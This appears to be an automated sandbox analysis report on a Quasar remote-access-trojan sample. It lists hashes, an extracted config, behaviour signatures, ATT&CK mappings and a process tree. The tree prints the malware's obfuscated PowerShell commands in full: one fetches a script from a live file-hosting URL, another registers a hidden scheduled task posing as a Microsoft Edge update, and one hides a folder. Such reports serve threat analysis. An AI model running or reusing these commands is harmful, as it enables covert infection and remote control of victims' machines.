quasar | bfa990bda3eebc658bcd0014dbfc9d57277e585548031f7ce4ecfcc8223f7b6b

Analysis

max time kernel
146s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20250410-en
resource tags

arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system
submitted
19/04/2025, 15:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fud.zip
Size

15.3MB
MD5

16a3d7fe2daaec168522818e8e4352eb
SHA1

cc421ffb059ddde7b99112edf3a98121458726e5
SHA256

bfa990bda3eebc658bcd0014dbfc9d57277e585548031f7ce4ecfcc8223f7b6b
SHA512

5e1f80ea42b5b72a3fc27c3aa1c882d305d68e4d150c7cf21522e25acaaf376b496f57667a6f2ac67031c1708e96414e314e66b88599eaa9f77a1d4b41d7c957
SSDEEP

393216:nSfvN08cA9br0VcaSLRxFijecz53Z5tPjNhRm3ygnrHoiFz:nYN08v9br0VFK6Z5X7mLHoiFz

Score

10^/10

quasar execution spyware trojan

Malware Config

Extracted

Family

quasar

��:a>՘�后��s��6�F�l濺�,@ 3&�

Attributes

encryption_key
0A2600918F5E13281DD3F3E3CF35CA2FEACB6884
reconnect_delay
3000
startup_key
�� D��s�+��\� r8t$�

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral1/memory/6084-85-0x00000217D10E0000-0x00000217D126E000-memory.dmp	family_quasar

Blocklisted process makes network request 3 IoCs

flow	pid	Process
73	368	powershell.exe
79	6084	powershell.exe
81	6084	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4772	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
6100	Installer.exe
5904	winAPI.dll

Loads dropped DLL 2 IoCs

pid	Process
6100	Installer.exe
6100	Installer.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
6084	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
4772	powershell.exe
4772	powershell.exe
4772	powershell.exe
368	powershell.exe
368	powershell.exe
368	powershell.exe
6084	powershell.exe
6084	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	5796	7zG.exe
Token: 35	5796	7zG.exe
Token: SeSecurityPrivilege	5796	7zG.exe
Token: SeSecurityPrivilege	5796	7zG.exe
Token: SeRestorePrivilege	6100	Installer.exe
Token: SeBackupPrivilege	6100	Installer.exe
Token: SeDebugPrivilege	6100	Installer.exe
Token: SeDebugPrivilege	4772	powershell.exe
Token: SeIncreaseQuotaPrivilege	4772	powershell.exe
Token: SeSecurityPrivilege	4772	powershell.exe
Token: SeTakeOwnershipPrivilege	4772	powershell.exe
Token: SeLoadDriverPrivilege	4772	powershell.exe
Token: SeSystemProfilePrivilege	4772	powershell.exe
Token: SeSystemtimePrivilege	4772	powershell.exe
Token: SeProfSingleProcessPrivilege	4772	powershell.exe
Token: SeIncBasePriorityPrivilege	4772	powershell.exe
Token: SeCreatePagefilePrivilege	4772	powershell.exe
Token: SeBackupPrivilege	4772	powershell.exe
Token: SeRestorePrivilege	4772	powershell.exe
Token: SeShutdownPrivilege	4772	powershell.exe
Token: SeDebugPrivilege	4772	powershell.exe
Token: SeSystemEnvironmentPrivilege	4772	powershell.exe
Token: SeRemoteShutdownPrivilege	4772	powershell.exe
Token: SeUndockPrivilege	4772	powershell.exe
Token: SeManageVolumePrivilege	4772	powershell.exe
Token: 33	4772	powershell.exe
Token: 34	4772	powershell.exe
Token: 35	4772	powershell.exe
Token: 36	4772	powershell.exe
Token: SeIncreaseQuotaPrivilege	4772	powershell.exe
Token: SeSecurityPrivilege	4772	powershell.exe
Token: SeTakeOwnershipPrivilege	4772	powershell.exe
Token: SeLoadDriverPrivilege	4772	powershell.exe
Token: SeSystemProfilePrivilege	4772	powershell.exe
Token: SeSystemtimePrivilege	4772	powershell.exe
Token: SeProfSingleProcessPrivilege	4772	powershell.exe
Token: SeIncBasePriorityPrivilege	4772	powershell.exe
Token: SeCreatePagefilePrivilege	4772	powershell.exe
Token: SeBackupPrivilege	4772	powershell.exe
Token: SeRestorePrivilege	4772	powershell.exe
Token: SeShutdownPrivilege	4772	powershell.exe
Token: SeDebugPrivilege	4772	powershell.exe
Token: SeSystemEnvironmentPrivilege	4772	powershell.exe
Token: SeRemoteShutdownPrivilege	4772	powershell.exe
Token: SeUndockPrivilege	4772	powershell.exe
Token: SeManageVolumePrivilege	4772	powershell.exe
Token: 33	4772	powershell.exe
Token: 34	4772	powershell.exe
Token: 35	4772	powershell.exe
Token: 36	4772	powershell.exe
Token: SeIncreaseQuotaPrivilege	4772	powershell.exe
Token: SeSecurityPrivilege	4772	powershell.exe
Token: SeTakeOwnershipPrivilege	4772	powershell.exe
Token: SeLoadDriverPrivilege	4772	powershell.exe
Token: SeSystemProfilePrivilege	4772	powershell.exe
Token: SeSystemtimePrivilege	4772	powershell.exe
Token: SeProfSingleProcessPrivilege	4772	powershell.exe
Token: SeIncBasePriorityPrivilege	4772	powershell.exe
Token: SeCreatePagefilePrivilege	4772	powershell.exe
Token: SeBackupPrivilege	4772	powershell.exe
Token: SeRestorePrivilege	4772	powershell.exe
Token: SeShutdownPrivilege	4772	powershell.exe
Token: SeDebugPrivilege	4772	powershell.exe
Token: SeSystemEnvironmentPrivilege	4772	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
5796	7zG.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
6084	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 6100 wrote to memory of 4444	6100	Installer.exe	118
PID 6100 wrote to memory of 4444	6100	Installer.exe	118
PID 4444 wrote to memory of 5904	4444	cmd.exe	119
PID 4444 wrote to memory of 5904	4444	cmd.exe	119
PID 5904 wrote to memory of 5404	5904	winAPI.dll	120
PID 5904 wrote to memory of 5404	5904	winAPI.dll	120
PID 5404 wrote to memory of 2868	5404	cmd.exe	121
PID 5404 wrote to memory of 2868	5404	cmd.exe	121
PID 2868 wrote to memory of 4628	2868	cmd.exe	122
PID 2868 wrote to memory of 4628	2868	cmd.exe	122
PID 2868 wrote to memory of 4772	2868	cmd.exe	123
PID 2868 wrote to memory of 4772	2868	cmd.exe	123
PID 2868 wrote to memory of 368	2868	cmd.exe	125
PID 2868 wrote to memory of 368	2868	cmd.exe	125
PID 2868 wrote to memory of 6084	2868	cmd.exe	127
PID 2868 wrote to memory of 6084	2868	cmd.exe	127
PID 6084 wrote to memory of 5720	6084	powershell.exe	132
PID 6084 wrote to memory of 5720	6084	powershell.exe	132
PID 5720 wrote to memory of 3536	5720	csc.exe	133
PID 5720 wrote to memory of 3536	5720	csc.exe	133

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4628	attrib.exe

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\fud.zip
1⤵
PID:3724

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5516

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\fud\" -spe -an -ai#7zMap16346:64:7zEvent15872
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5796

C:\Users\Admin\Desktop\fud\Installer.exe
"C:\Users\Admin\Desktop\fud\Installer.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:6100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c winAPI.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4444
- - C:\Users\Admin\Desktop\fud\winAPI.dll
    winAPI.dll
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:5904
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5404
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2868
      - C:\Windows\system32\attrib.exe
        
        attrib +h "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache"
        6⤵
        Views/modifies file attributes
        
        PID:4628
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoPr"o"file -Execu"t"ionPolic"y" Byp"a"ss -Windo"w"Style Hid"d"en -Com"m"and "$action = New-ScheduledT"a"skAction -Execute 'powershell.exe' -Argument '-NoProfile -Exe"c"utionPo"l"icy B"y"pass -Wind"o"wStyle Hidden -File \"C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1\"'; $trigger = New-ScheduledTaskTrigger -AtLogOn -User $env:USERNAME; $settings = New-ScheduledTaskSettingsSet -Hidden -DontStopIfGoingOnBatteries; $principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive; Register-ScheduledTask -TaskName 'Micro"s"oftEdge"U"pdat"e"Task' -Action $action -Trigger $trigger -Settings $settings -Principal $principal -Force | Out-Null"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4772
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoPr"o"file -Exe"c"utionPol"i"cy By"p"ass -Win"d"owStyle H"i"dd"e"n -Co"m"mand "Invo"k"e-W"e"bRequ"e"st 'ht"t"ps://"f"iles."c"atbo"x".moe/92nbzf.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1' -Use"B"asicParsing"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:368
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -N"o"Profi"l"e -Execu"t"ionPol"i"cy Bypa"s"s -WindowSt"y"le Hi"d"den -Fi"l"e "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:6084
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fwp02hc1\fwp02hc1.cmdline"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:5720
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9783.tmp" "c:\Users\Admin\AppData\Local\Temp\fwp02hc1\CSC5EB9996A6381443090C6508DEBB8E4CD.TMP"
        8⤵
        
        PID:3536

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
18400984025fba1ced95d051c7c912fb

SHA1
c8f6ddaab9d251bf71a96f6b8b5245a03d8567e4

SHA256
01d3ee84c20dc8cb9ae8f64396b5eae9328b99aa53b423b707df97281c38377f

SHA512
7b5dc6fcbed65af26e203f5b350fcc03b942e3b6e69cb3f14c7b29b1c6c3bef6fcf4887233d0ab72edcc9207b4ca854f52dbb332539baa5b3d18d405194ace4e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7a9362df1244fada1c58e24dda3ff05d

SHA1
aedefa83f0f4abc9fe2ce9299b83ef6aa61478ae

SHA256
5e13d857e7da304d09b050c12c14cb23554216adc71a1d12dd6cae8080481796

SHA512
f0370f978d9717c6384b0ea339b822b52fabbdbf4c30191ac9dff8f833e2729cedde08d21cc237203d406865a468db15f1de9b039b2f48882993f0aeffce7ea8

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.bat

Filesize
1KB

MD5
56ed4e1fbde1df51fb37b6677265ec3d

SHA1
6dc4cf3ebe6c0043c6fca9b5c9c46a3f5a492d17

SHA256
d65e44cd5593e4f8d380c23516e94db3b18e9a5c42ef40697beb2a611aaa9204

SHA512
c9c037b3713d2774301a4d68beee7c528fd2ade5aac95f06c82b1ef9f23ba47ec316cfc0d711fd773c8c81fd33366537395daee361325c5465cf02eb6dae41c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9783.tmp

Filesize
1KB

MD5
2880f59b5dacd91e32f06044c7e96152

SHA1
91939bec0fdd88b0f9b249654899dc198d74d14c

SHA256
426d34b9ce8a82b3a41de8b1ab21024c870118e56f43c5a0b9ba42592a5b1bb9

SHA512
65342ac30c394fb9c0efb5cce9acde8bf2223219cb318333700f3f8a01937ee1325b58ccb6e46780a5a95d7f707cf2387d220b87efc25a9ca41800b3597ef656

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pfjfocio.d4g.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\fwp02hc1\fwp02hc1.dll

Filesize
3KB

MD5
560cad21c334d07756d2cb26d7e3b84f

SHA1
82ca0529317df9705b362e1c3a9fe2ee5958ba2d

SHA256
e8e0128c09c52577d3db0c92f2b0f2acfeb9310b57854ce9728fa7dea2651d89

SHA512
34e35473137f79b7074786b81489c19e4e825ba09d1fc5ced333dad27c35aa5667f717587a80066735f24ec551c76572addefbb6a3a20bee29acf3d13613ce92

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\UDCache\task.ps1

Filesize
7.0MB

MD5
f46cd513598c2b1ffb63fe501301dd64

SHA1
d1d71cfdc9ea551470478b2452d0e451b8d055e8

SHA256
e8d38cba909fb2374dc0a406fcc0c4360ffb12ba5d588856690e7e06657e6df5

SHA512
bbd43f0f9b7eddc0857ac14339859e0e6b756de8749e54795d86bcdb580d6bf369a5a4050231bf1bdb361ff817907175180f04f352df2e35fce63fbeb4f91974

Download Submit
C:\Users\Admin\Desktop\fud\Installer.exe

Filesize
53KB

MD5
f323bb458ecbd21acdddd5ea770e775f

SHA1
9b04a6ea2e6efcc81d344f6425928c5700e9a3f6

SHA256
4030427f5e93a3cbb5072fe12afb02a4cb6447a4d0061b4dc9f71fdb783ab926

SHA512
ca08182341611a89da1f4c90efbd065691a551e68d534ed509bf3ffca8d821362be14b175cfb8378fc2199432938c1d3e63524d9424802a37c0435467a5dabe2

Download Submit
C:\Users\Admin\Desktop\fud\msys-2.0.dll

Filesize
88KB

MD5
f947218a2b6bc294c22175030824c12b

SHA1
ba97c647a21d78f4d70135231574a9162998a3bf

SHA256
940d104b54c78abc2ab4af8d88c0da0083dda6ddf63e92976d96fadcf46d35c4

SHA512
46cb9b32a5bc07fb55fded5e42bbc8362ba0106d19c4441a639a821cd612867f676017d525d167384c9595b506db2d7a6f2ac8fa2d2c7fe102ede7b6132cd6e5

Download Submit
C:\Users\Admin\Desktop\fud\tmpD01A.dll

Filesize
3.5MB

MD5
1a201cec87e2370a08dc00acc065501a

SHA1
02ff14bbb59d380cc8e7ffea711d978248bfcb83

SHA256
709f39277a3393fbdb4349bb19b80e2d976dd8926d6fcbe0e59d699338846016

SHA512
e80e75a672807dfa1da6002bb02e8024eaadb75f79f22c40c72c82c213d99b3f4dcdeb963a7587c0a5532fa8b6c53e9ac6eb512fc422d654191215e266eef1e1

Download Submit
C:\Users\Admin\Desktop\fud\winAPI.dll

Filesize
36.0MB

MD5
fb466528aac78a063f4c60882a33ddc9

SHA1
2af35fa26c27e402e66b7c46d136a4a578f975af

SHA256
6f157135b2b74872f88863cc5bd1edbe8fbe3532dfb9e1b961afca9bb5c77fd3

SHA512
0539f5681271f70262288fcc0b7bd89d63c6c8b8f32f96bd43878df531f9997cde314357f541ca49f58363c484cca80a107b450fd37e3e35e75fd90edac71e77

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fwp02hc1\CSC5EB9996A6381443090C6508DEBB8E4CD.TMP

Filesize
652B

MD5
2ef671885a70d0f35204f9b2743a00cd

SHA1
59f115d0a48f3ee45f3ae4b307df402b6ea85315

SHA256
608446d296d03c735f400309f2bc8c0228d546ecf881f4c0bb90563d1a3c72ef

SHA512
267fe9549fcfd23b6a9d16e105b507d5b94d5eace19335b0b748f73152c61ca12a07863c2b33de7a322ddb177815f3160c7175225ba43f25e360a1bb06fa9765

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fwp02hc1\fwp02hc1.0.cs

Filesize
938B

MD5
5b328f64341f326554c2d3c08ace5f93

SHA1
25a9aad6022782e5200d410aa9ff8e707ee2eb1a

SHA256
6e7a0c2174ae7882e6bd3f4afdf0438b982649021048df980b08c5ac948a01b9

SHA512
d4116697a54bc21a8d77aaa8eeafa95d60b6873073f2294d027829a83dc82bf39d63f08464b7622dcfd4ec3a1991b6225f72399321a5f93582d84387088badd0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fwp02hc1\fwp02hc1.cmdline

Filesize
369B

MD5
a9820a1854ac0183399485ff3834e176

SHA1
98d65f20d0c5b868ead4e8e4615dec32ed293be6

SHA256
6ffd2de6964d7b1bfc3b8e560e69df4dd852ac06c987a0ce58434b2dc484d5d8

SHA512
daebecb74ba9dc5debbef538146ee4f373ae079ef65b43f740076be99eb3ae2890e5729cb636dd395f1ec94200b12e79b2b0c50d6804e4c20f7b1d26fb4bd552

Download Submit
memory/4772-23-0x000001C010040000-0x000001C010062000-memory.dmp

Filesize
136KB

Download
memory/6084-87-0x00000217D1040000-0x00000217D1052000-memory.dmp

Filesize
72KB

Download
memory/6084-88-0x00000217D1050000-0x00000217D108A000-memory.dmp

Filesize
232KB

Download
memory/6084-98-0x00000217D1B50000-0x00000217D1B8C000-memory.dmp

Filesize
240KB

Download
memory/6084-81-0x0000021797DF0000-0x0000021797DF8000-memory.dmp

Filesize
32KB

Download
memory/6084-97-0x00000217D1AF0000-0x00000217D1B02000-memory.dmp

Filesize
72KB

Download
memory/6084-83-0x00000217D0AE0000-0x00000217D0C4A000-memory.dmp

Filesize
1.4MB

Download
memory/6084-85-0x00000217D10E0000-0x00000217D126E000-memory.dmp

Filesize
1.6MB

Download
memory/6084-86-0x0000021798440000-0x000002179845A000-memory.dmp

Filesize
104KB

Download
memory/6084-93-0x00000217D1880000-0x00000217D18CA000-memory.dmp

Filesize
296KB

Download
memory/6084-94-0x00000217D1090000-0x00000217D10BA000-memory.dmp

Filesize
168KB

Download
memory/6084-89-0x00000217D17E0000-0x00000217D1830000-memory.dmp

Filesize
320KB

Download
memory/6084-90-0x00000217D18F0000-0x00000217D19A2000-memory.dmp

Filesize
712KB

Download
memory/6084-91-0x00000217D1790000-0x00000217D17DE000-memory.dmp

Filesize
312KB

Download
memory/6084-92-0x00000217D1830000-0x00000217D187C000-memory.dmp

Filesize
304KB

Download
memory/6100-46-0x0000000100400000-0x000000010040D000-memory.dmp

Filesize
52KB

Download
memory/6100-66-0x0000000210040000-0x0000000210346000-memory.dmp

Filesize
3.0MB

Download
memory/6100-16-0x0000000210040000-0x0000000210346000-memory.dmp

Filesize
3.0MB

Download
memory/6100-47-0x0000000210040000-0x0000000210346000-memory.dmp

Filesize
3.0MB

Download